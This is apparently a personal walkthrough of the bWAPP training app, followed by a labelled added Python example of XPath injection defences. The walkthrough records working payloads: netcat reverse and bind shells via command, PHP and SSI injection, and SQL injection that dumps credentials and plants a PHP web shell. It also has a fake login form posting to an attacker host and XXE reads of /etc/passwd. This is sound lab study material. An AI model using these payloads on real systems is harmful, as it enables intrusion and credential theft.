BWAPP - Sanjiv Kawa


bWAPP - Sanjiv Kawa
April 2, 2015, 10:37 AM

/ A1 - Injection /
HTML Injection - Reflected (GET)
HTML Injection - Reflected (POST)
HTML Injection - Reflected (Current URL)
HTML Injection - Stored (Blog)
iFrame Injection
LDAP Injection (Search)
Mail Header Injection (SMTP)
OS Command Injection
OS Command Injection - Blind
PHP Code Injection
Server-Side Includes (SSI) Injection
SQL Injection (GET/Search)
SQL Injection (GET/Select)
SQL Injection (POST/Search)
SQL Injection (POST/Select)
SQL Injection (AJAX/JSON/jQuery)
SQL Injection (CAPTCHA)
SQL Injection (Login Form/Hero)
SQL Injection (Login Form/User)
SQL Injection (SQLite)
SQL Injection (Drupal)
SQL Injection - Stored (Blog)
SQL Injection - Stored (SQLite)
SQL Injection - Stored (User-Agent)
SQL Injection - Stored (XML)
SQL Injection - Blind - Boolean-Based
SQL Injection - Blind - Time-Based
SQL Injection - Blind (SQLite)
SQL Injection - Blind (Web Services/SOAP)
XML/XPath Injection (Login Form)
XML/XPath Injection (Search)

/ A2 - Broken Auth. & Session Mgmt. /
Broken Authentication - CAPTCHA Bypassing
Broken Authentication - Forgotten Function
Broken Authentication - Insecure Login Forms
Broken Authentication - Logout Management
Broken Authentication - Password Attacks
Broken Authentication - Weak Passwords
Session Management - Administrative Portals
Session Management - Cookies (HTTPOnly)
Session Management - Cookies (Secure)
Session Management - Session ID in URL
Session Management - Strong Sessions

/ A3 - Cross-Site Scripting (XSS) /
Cross-Site Scripting - Reflected (GET)
Cross-Site Scripting - Reflected (POST)
Cross-Site Scripting - Reflected (JSON)
Cross-Site Scripting - Reflected (AJAX/JSON)
Cross-Site Scripting - Reflected (AJAX/XML)
bWAPP Page 1
Cross-Site Scripting - Reflected (Back Button)
Cross-Site Scripting - Reflected (Custom Header)
Cross-Site Scripting - Reflected (Eval)
Cross-Site Scripting - Reflected (HREF)
Cross-Site Scripting - Reflected (Login Form)
Cross-Site Scripting - Reflected (phpMyAdmin)
Cross-Site Scripting - Reflected (PHP_SELF)
Cross-Site Scripting - Reflected (Referer)
Cross-Site Scripting - Reflected (User-Agent)
Cross-Site Scripting - Stored (Blog)
Cross-Site Scripting - Stored (Change Secret)
Cross-Site Scripting - Stored (Cookies)
Cross-Site Scripting - Stored (SQLiteManager)
Cross-Site Scripting - Stored (User-Agent)

/ A4 - Insecure Direct Object References /
Insecure DOR (Change Secret)
Insecure DOR (Reset Secret)
Insecure DOR (Order Tickets)

/ A5 - Security Misconfiguration /
Arbitrary File Access (Samba)
Cross-Domain Policy File (Flash)
Cross-Origin Resource Sharing (AJAX)
Cross-Site Tracing (XST)
Denial-of-Service (Large Chunk Size)
Denial-of-Service (Slow HTTP DoS)
Denial-of-Service (SSL-Exhaustion)
Denial-of-Service (XML Bomb)
Insecure FTP Configuration
Insecure SNMP Configuration
Insecure WebDAV Configuration
Local Privilege Escalation (sendpage)
Local Privilege Escalation (udev)
Man-in-the-Middle Attack (HTTP)
Man-in-the-Middle Attack (SMTP)
Old/Backup & Unreferenced Files
Robots File

/ A6 - Sensitive Data Exposure /
Base64 Encoding (Secret)
BEAST/CRIME/BREACH Attacks
Clear Text HTTP (Credentials)
Heartbleed Vulnerability
Host Header Attack (Reset Poisoning)
HTML5 Web Storage (Secret)
POODLE Vulnerability
SSL 2.0 Deprecated Protocol
Text Files (Accounts)

/ A7 - Missing Functional Level Access Control /
Directory Traversal - Directories
Directory Traversal - Files
Host Header Attack (Cache Poisoning)
Host Header Attack (Reset Poisoning)
Local File Inclusion (SQLiteManager)
Remote & Local File Inclusion (RFI/LFI)
Restrict Device Access
Restrict Folder Access
Server Side Request Forgery (SSRF)
XML External Entity Attacks (XXE)

/ A8 - Cross-Site Request Forgery (CSRF) /
Cross-Site Request Forgery (Change Password)
Cross-Site Request Forgery (Change Secret)
Cross-Site Request Forgery (Transfer Amount)

/ A9 - Using Known Vulnerable Components /
Buffer Overflow (Local)
Buffer Overflow (Remote)
Drupal SQL Injection (Drupageddon)
Heartbleed Vulnerability
PHP CGI Remote Code Execution
PHP Eval Function
phpMyAdmin BBCode Tag XSS
Shellshock Vulnerability (CGI)
SQLiteManager Local File Inclusion
SQLiteManager PHP Code Injection
SQLiteManager XSS

/ A10 - Unvalidated Redirects & Forwards /
Unvalidated Redirects & Forwards (1)
Unvalidated Redirects & Forwards (2)

/ Other bugs. /
ClickJacking (Movie Tickets)
Client-Side Validation (Password)
HTTP Parameter Pollution
HTTP Response Splitting
HTTP Verb Tampering
Information Disclosure - Favicon
Information Disclosure - Headers
Information Disclosure - PHP version
Information Disclosure - Robots File
Insecure iFrame (Login Form)
Unrestricted File Upload

--------------------------- Extras -------------------------
A.I.M. - No-authentication Mode
Client Access Policy File
Cross-Domain Policy File
Evil 666 Fuzzing Page
Manual Intervention Required!
Unprotected Admin Portal
We Steal Secrets. (html)
We Steal Secrets. (plain)
WSDL File (Web Services/SOAP)

A1: Injection
March 31, 2015, 9:03 AM
Areas with an asterisk next to them have not been listed in this walkthrough.
HTML Injection - Reflected (GET)
HTML Injection - Reflected (POST)
HTML Injection - Reflected (Current URL)
HTML Injection - Stored (Blog)
iFrame Injection
OS Command Injection
OS Command Injection - Blind
PHP Code Injection
Server-Side Includes (SSI) Injection
SQL Injection (GET/Search)
SQL Injection (GET/Select)
SQL Injection (POST/Search)
SQL Injection (POST/Select)
SQL Injection (Login Form/Hero)
SQL Injection (SQLite)
SQL Injection (Drupal)
SQL Injection - Stored (Blog)
SQL Injection - Stored (SQLite)
SQL Injection - Stored (User-Agent)
SQL Injection - Blind - Boolean-Based
SQL Injection - Blind - Time-Based
XML/XPath Injection (Login Form)
*LDAP Injection (Search)
*Mail Header Injection (SMTP)
*SQL Injection (AJAX/JSON/jQuery)
*SQL Injection (CAPTCHA)
*SQL Injection (Login Form/User)
*SQL Injection - Stored (XML)
*SQL Injection - Blind (SQLite)
*SQL Injection - Blind (Web Services/SOAP)
*XML/XPath Injection (Search)

HTML Injection - Reflected (GET)
March 31, 2015, 9:03 AM
<h2>HTML Injection - Reflected (GET)</h2>
http://192.168.254.131/bWAPP/htmli_get.php?firstname=<h1><a href="http://www.google.com">Click Me!</a></h1>&lastname=<h2>blah</h2>&form=submit

HTML Injection - Reflected (POST)
March 31, 2015, 9:08 AM
firstname=<h1><a href="http://www.google.com">Click Me!</a></h1>&lastname=<h2>blah</h2>&form=submit

HTML Injection - Reflected (URL)
March 31, 2015, 9:11 AM


HTML Injection - Stored (Blog)
March 31, 2015, 9:16 AM
<div class="code"><iframe SRC="http://attackerIP/blah" height="0" width="0"></iframe></div>
<div class="code">test</div>

<div style="position: absolute; left: 0px; top: 0px; width: 800px; height: 600px; z-index: 1000; background-color: white;">Session Expired, Please Login:<br><form name="login" action="http://attackerIP/lol.htm"><table><tr><td>Username:</td><td><input type="text" name="uname"/></td></tr><tr><td>Password:</td><td><input type="password" name="pw"/></td></tr></table><input type="submit" value="Login"/></form></div>


iFrame Injection
March 31, 2015, 9:42
l=http://www.hello.com/&ParamWidth=500&ParamHeight=500


OS Command Injection
March 31, 2015, 10:47 AM
www.nsa.gov && nc -vn 192.168.254.128 4444 -e /bin/bash

; whoami

OS Command Injection (Blind)
March 31, 2015, 11:07 AM

192.168.254.128 && nc -vn 192.168.254.128 4444 -e
nd-os-command-injection-attacks.html

PHP Code Injection
March 31, 2015, 11:29 AM

message=1; phpinfo()


phpi.php?message=""; system('nc -lvp 1234 -e /bin/bash')

Server Side Include (SSI) Injection
March 31, 2015, 11:50 AM
<!--#exec cmd="id" -->
<!--#exec cmd="cat /etc/passwd" -->

connect to me on port 8888!
<!--#exec cmd="nc -lvp 8888 -e /bin/bash" -->

SQLi (GET/Search)
March 31, 2015, 11:53 AM


sqli_1.php?title='&action=search

sqli_1.php?title=iron' or 1=1#&action=search

sqli_1.php?title=validEntry' or 1=2#&action=search
sqli_1.php?title=iron' union select 1,2,3,4,5,6,7 #&action=search

sqli_1.php?title=iron' union select 1,user(),@@version,4,5,6,7 #&action=search
iron' union select 1,login,password,email,5,6,7 from users #
sqli_1.php?title=iron' union select 1,"<?php echo shell_exec($_GET['cmd'])?>",3,4,5,6,7 into OUTFILE '/var/www/bWAPP/popped.php' #&action=search

Select * from movies where title like 'iron'

SQLi (GET/Select)
March 31, 2015, 12:35 PM
sqli_2.php?movie=1 and 1=2#&action=go

sqli_2.php?movie=1 union select 1,2,3,4,5,6#&action=go
sqli_2.php?movie=1 union select 1,2,3,4,5,6,7#&action=go

sqli_2.php?movie=1337 union select 1,2,3,4,5,6,7#&action=go
sqli_2.php?movie=1337 union select 1,login,3,email,password,6,7 from users#&action=go

SQLi (POST/Search)
March 31, 2015, 1:07 PM


SQLi (POST/Select)
March 31, 2015, 1:06 PM

SQLi (Login Form/Hero)
March 31, 2015, 2:48 PM
'

login=' or 1=1#&password=&form=submit


SQLi Stored (Blog)
March 31, 2015, 3:34 PM

test','test')#


canary1','canary2')#

canary1',(select password from mysql.user where user='root' limit 0,1))#

canary1',(select version()))#
canary1',(select user()))#

SQLi Stored (User-Agent)
March 31, 2015, 3:56 PM


SQLi Blind (Boolean Based)
April 1, 2015, 9:31 AM
This can be leveraged in conjunction with the substring function to identify table names based on true/false responses.

SQLi Blind (Time Based)
April 1, 2015, 9:35 AM
test'-IF(MID(VERSION(),1,1)='5', SLEEP(5), 0)#

XML/XPATH Injection (Login Form)
April 1, 2015, 10:14 AM
Intercept responses
http://pastebin.com/index/uT6zQGVx
$login = $_REQUEST["login"];
$login = xmli($login);
$password = $_REQUEST["password"];
$password = xmli($password);
// Loads the XML file
$xml = simplexml_load_file("passwords/heroes.xml");
// XPath search
$result = $xml->xpath("/heroes/hero[login='" . $login . "' and password='" . $password . "']");
[login='" . $login . "' and password='" . $password . "']
[login='' and password='']
[login='whatever'' and password='']
[login='whatever' or 1=1' and password='']
[login='whatever' or 1=1 or '' and password='']
whatever' or 1=1 or '
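Added example, not part of the walkthrough or of bWAPP: the predicate from the PHP above rebuilt in Python, with the walkthrough's concatenation beside two defences, a quoting helper for XPath 1.0 string literals (XPath 1.0 has no parameter binding and no escape character, so a value holding both quote kinds has to be spliced with concat()) and a lookup that compares values without building a query at all. The heroes.xml content, logins and passwords are constructed.

```python
import xml.etree.ElementTree as ET

# Constructed stand-in for bWAPP's passwords/heroes.xml; logins and passwords are made up.
HEROES_XML = """<heroes>
  <hero><login>hero1</login><password>pass1</password></hero>
  <hero><login>hero2</login><password>pass2</password></hero>
</heroes>"""


def vulnerable_predicate(login, password):
    # The walkthrough's PHP concatenation: a quote in the input rewrites the query.
    return "/heroes/hero[login='" + login + "' and password='" + password + "']"


def xpath_literal(value):
    # Quote value as an XPath 1.0 string literal. A value containing only one kind
    # of quote gets the other kind; one containing both is split on ' and rejoined
    # with concat(), so no input can ever terminate the literal.
    if "'" not in value:
        return "'" + value + "'"
    if '"' not in value:
        return '"' + value + '"'
    parts = ["'" + p + "'" for p in value.split("'")]
    return "concat(" + ", \"'\", ".join(parts) + ")"


def safe_predicate(login, password):
    # Same expression shape as the PHP, but the values can only ever be literals.
    return "/heroes/hero[login=%s and password=%s]" % (xpath_literal(login), xpath_literal(password))


def find_hero(xml_text, login, password):
    # Strongest fix: do not build a query from user input at all. Walk the document
    # and compare values as plain strings (a real system would compare password hashes).
    root = ET.fromstring(xml_text)
    for hero in root.findall("hero"):
        if hero.findtext("login") == login and hero.findtext("password") == password:
            return login
    return None


if __name__ == "__main__":
    injected = "whatever' or 1=1 or '"
    print(vulnerable_predicate(injected, ""))
    print(safe_predicate(injected, ""))
    print(find_hero(HEROES_XML, injected, ""))
```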

A2: Broken Authentication
April 1, 2015, 3:24 PM
Areas with an asterisk next to them have not been listed in this walkthrough.
Broken Authentication - Insecure Login Forms
Broken Authentication - Logout Management
Session Management - Administrative Portals
*Broken Authentication - CAPTCHA Bypassing
*Broken Authentication - Forgotten Function
*Broken Authentication - Password Attacks
*Broken Authentication - Weak Passwords
*Session Management - Cookies (HTTPOnly)
*Session Management - Cookies (Secure)
*Session Management - Session ID in URL
*Session Management - Strong Sessions

BA - Insecure Login Form
April 1, 2015, 3:25 PM

BA - Logout Management
April 1, 2015, 3:26 PM

BA - Session Management
April 1, 2015, 3:31 PM


A4: Insecure Direct Object References
April 1, 2015, 3:46 PM
Areas with an asterisk next to them have not been listed in this walkthrough.
Insecure DOR (Change Secret)
Insecure DOR (Order Tickets)
*Insecure DOR (Reset Secret)

Insecure Direct Object Reference (Change Secret)
April 1, 2015, 3:42 PM
Bee can be changed to bob


Insecure Direct Object Reference (Order Ticket)
April 1, 2015, 3:51 PM


A6: Sensitive Data Exposure
April 2, 2015, 9:15 AM
Areas with an asterisk next to them have not been listed in this walkthrough.
Base64 Encoding (Secret)
HTML5 Web Storage (Secret)
*BEAST/CRIME/BREACH Attacks
*Clear Text HTTP (Credentials)
*Heartbleed Vulnerability
*Host Header Attack (Reset Poisoning)
*POODLE Vulnerability
*SSL 2.0 Deprecated Protocol
*Text Files (Accounts)

Base64 Encoding
April 2, 2015, 9:15 AM

HTML5 Web Storage
April 2, 2015, 9:16 AM


A7: Missing Functional Level Access Control
April 1, 2015, 4:06 PM
Areas with an asterisk next to them have not been listed in this walkthrough.
Directory Traversal - Files
Host Header Attack (Cache Poisoning)
Remote & Local File Inclusion (RFI/LFI)
Restrict Device Access
XML External Entity Attacks (XXE)
*Directory Traversal - Directories
*Host Header Attack (Reset Poisoning)
*Local File Inclusion (SQLiteManager)
*Restrict Folder Access
*Server Side Request Forgery (SSRF)

Directory Traversal (Directories)
April 1, 2015, 4:07 PM


Directory Traversal (Files)
Wednesday, April 1, 2015, 7:48 PM


Host Header Attack (Cache Poisoning)
Wednesday, April 1, 2015, 8:02 PM


Remote and Local File Inclusion
Wednesday, April 1, 2015, 8:27 PM


Restrict Device Access
Wednesday, April 1, 2015, 8:38 PM
Mozilla/5.0 (iPhone; U; CPU iPhone OS 4 o) Version/4.0.5 Mobile/8A293 Safari/6531.22.7


XML External Entity Attacks (XXE)
April 2, 2015, 8:24 AM

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [<!ENTITY popped SYSTEM "http://192.168.254.131/bWAPP/robots.txt">]>
<reset><login>&popped;</login><secret>Any bugs?</secret></reset>

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE root [<!ENTITY popped SYSTEM "file:///etc/passwd">]>
<reset><login>&popped;</login><secret>Any bugs?</secret></reset>


Extras: PHP Eval()
April 2, 2015, 1:38
securety.net/?p=705

